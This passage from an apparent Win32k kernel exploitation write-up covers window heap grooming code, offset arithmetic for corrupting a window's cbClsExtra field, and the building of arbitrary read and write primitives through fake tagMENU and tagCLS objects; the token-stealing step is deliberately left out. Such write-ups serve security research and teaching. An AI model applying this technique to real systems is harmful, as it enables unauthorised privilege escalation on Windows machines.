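int find_adjacent_triple(const uint64_t *addrs, size_t n, uint64_t stride,
                         size_t out[3])
{
    assert(stride != 0);   /* a zero stride would match an object with itself */

    for (size_t i = 0; i < n; i++) {
        ptrdiff_t mid   = find_addr(addrs, n, addrs[i] + stride);
        ptrdiff_t right = find_addr(addrs, n, addrs[i] + 2 * stride);
        if (mid < 0 || right < 0)
            continue;
        out[0] = i;               /* LeftGuard candidate            */
        out[1] = (size_t)mid;     /* window to destroy (the hole)   */
        out[2] = (size_t)right;   /* RightGuard candidate           */
        return 1;
    }
    return 0;
}
```

The search does not rely on allocation order, since consecutive CreateWindowEx calls are not guaranteed to return consecutive chunks.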

The tagWND size must be greater than 90h bytes (this can be achieved via the cbWndExtra field of GuardClass). This is critical because we will later use this region to bypass some internal checks in Win32k when finalizing the write primitive.

The value we place in spwndPopupMenu is VA-of-Manager + 63h - 120h:

60h is the offset of cbClsExtra
03h selects the most significant byte of the stored dword
120h is subtracted because the write lands at field_120, 120h bytes past the pointer
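The arithmetic can be checked with a small model. The offsets come from the text; the helper names are hypothetical, and the write is modelled as a one-byte OR, which is an assumption about the instruction shown in the disassembly figure. The Manager is represented by a plain byte buffer rather than a real kernel object.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

enum {
    CBCLSEXTRA_OFFSET = 0x60,   /* offset of cbClsExtra (from the text)        */
    TOP_BYTE          = 0x03,   /* most significant byte of the stored dword   */
    FIELD_120_OFFSET  = 0x120   /* offset the OR is applied at (from the text) */
};

/* Value to plant in the fake object's spwndPopupMenu field. */
uint64_t fake_spwnd_popup_menu(uint64_t manager_va)
{
    return manager_va + CBCLSEXTRA_OFFSET + TOP_BYTE - FIELD_120_OFFSET;
}

/* Models `*(uint8_t *)(spwnd + 0x120) |= 2` against a byte buffer that
 * stands in for the Manager object located at manager_va. */
void model_or_write(uint8_t *manager_bytes, uint64_t manager_va, uint64_t spwnd)
{
    uint64_t touched = spwnd + FIELD_120_OFFSET;   /* absolute address hit */
    manager_bytes[touched - manager_va] |= 0x02;
}
```

Because the OR hits byte 3 of a little-endian dword, a cbClsExtra of 10h becomes 02000010h, so roughly 32 MB past the object passes the size check.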

Now it’s time to prepare the fake object that will allow us to overwrite the cbClsExtra field in our Manager.

Pseudo code of write operation

The memory once occupied by the original tagMENU is now replaced with controlled data. We control this memory via the lpszAnsiClassName field of a tagCLS, as explained in the Heap Feng Shui section.

Now we are ready to move on and make final primitives.

Arbitrary Read

We’ll start by implementing the read primitive, since it will be used later in our arbitrary write.

This primitive leverages the GetMenuBarInfo API in combination with our RightGuard window. When called with OBJID_MENU (value -3), GetMenuBarInfo retrieves information about the menu attached to a window (specifically a tagWND).

Internally, GetMenuBarInfo is backed by xxxGetMenuBarInfo and it reads from the rgItems field of the associated tagMENU object. The pointer to this tagMENU comes from the spmenu field inside tagWND.

xxxGetMenuBarInfo implementation

Because we already have a relative read/write via our Manager, we can modify the spmenu field in RightGuard to point to a fake tagMENU structure under our control. This allows us to trick GetMenuBarInfo into reading from an arbitrary address.

The implementation of this technique is shown in the image below.

Read64 implementation

Arbitrary Write

To implement the arbitrary write, we use the same relative read/write primitive from the Manager to modify the pcls pointer in RightGuard, pointing it to a fake tagCLS under our control.

We then call SetClassLongPtr on RightGuard, which operates on this fake structure. Internally, Win32k uses the pclsClone field of tagCLS to compute the destination address.

SetClassLongPtr implementation

As seen in the pseudocode, the base address the write is computed from should be VA-of-WriteTarget - A0h, where A0h is the offset of the _extra field. The write occurs in a loop, and the field at offset 00h (the next pointer) must be zero, or the loop will continue and likely cause a crash or corrupt other memory.

To satisfy the condition in SetClassLongPtr, we use our read primitive to check if the target address (VA-of-WriteTarget - 0xA0) points to a zeroed memory region. If it doesn’t, we adjust our fake pclsClone pointer backwards until we find an address that does point to zero. This avoids triggering the linked list loop inside SetClassLongPtr.

To compensate for the shifted base, we use the second parameter of SetClassLongPtr, which acts as an index (the local variable named offset in the pseudocode above).

This index is added internally when the final write address is calculated, so we still land exactly on the original target even though the base pointer was shifted.
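The search for a usable base and the compensating index can be sketched as follows. This is an illustration under stated assumptions, not the author's Write64: the 8-byte step, the `max_steps` limit, and the names `plan_write`, `read64_fn`, `fake_mem` and `fake_read64` are all hypothetical. The read primitive is passed in as a callback, so the logic can be exercised against simulated memory.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

enum { EXTRA_OFFSET = 0xA0 };   /* offset of _extra (from the text) */

typedef uint64_t (*read64_fn)(uint64_t va, void *ctx);

typedef struct {
    uint64_t base;    /* pointer to plant as the fake base       */
    uint64_t index;   /* index to pass to compensate the shift   */
    int      ok;      /* 1 if a zeroed qword was found           */
} write_plan;

/* Walks backwards from target - A0h until the qword at `base` is zero. */
write_plan plan_write(read64_fn read64, void *ctx, uint64_t target,
                      unsigned max_steps)
{
    write_plan p = { target - EXTRA_OFFSET, 0, 0 };
    for (unsigned i = 0; i <= max_steps; i++) {
        if (read64(p.base, ctx) == 0) {
            p.ok = 1;
            return p;
        }
        p.base  -= 8;   /* assumed step: one qword at a time */
        p.index += 8;
    }
    return p;
}

/* Simulated memory so the planner can be tried without a kernel primitive. */
typedef struct { uint64_t va; const uint64_t *words; size_t count; } fake_mem;

uint64_t fake_read64(uint64_t va, void *ctx)
{
    const fake_mem *m = ctx;
    assert(va >= m->va && (va - m->va) % 8 == 0);
    size_t i = (size_t)((va - m->va) / 8);
    assert(i < m->count);
    return m->words[i];
}
```

Whatever base is chosen, `base + A0h + index` still equals the original target, which is the invariant the index parameter exists to preserve.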

Write64 implementation

Finally, we must not forget to restore the original tagCLS pointer in RightGuard.

Conclusions

I hope I managed to explain the full exploitation process in a clear and structured way. If you have any questions, feel free to reach out — I’m happy to answer or discuss further.

We intentionally left out the final step — the actual token stealing implementation. It’s not very complicated, and if you’ve followed the write-up this far, consider it a practical exercise for the reader.